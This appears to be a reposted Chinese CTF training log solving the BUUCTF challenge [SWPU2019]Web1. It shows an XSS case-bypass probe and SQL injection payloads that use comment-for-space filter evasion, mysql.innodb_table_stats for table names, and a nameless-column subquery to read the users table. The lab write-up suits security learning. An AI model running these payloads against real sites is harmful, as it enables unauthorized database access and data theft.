[BUUCTF]第十二天训练日志

本文主要是介绍[BUUCTF]第十二天训练日志，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

[SWPU2019]Web1

首先注册一个admin用户提示已经被注册，估计要伪造admin身份了,发布广告那一页<script>alert(1);</scirpt>现实被过滤了，试试大小写,成功了，啊这，快乐

看到上面的id参数总觉得是sql注入，怀疑环境出问题了，烦

啊这，看了别人的wp才知道，注入点不是url，是标题栏,然后通过union select发现注入位是第2和第3位,禁用了information_schema.tables，查表名-1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
通过子查询-1'/**/union/**/select/**/1, (select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/sele ct*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'

这篇关于[BUUCTF]第十二天训练日志的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---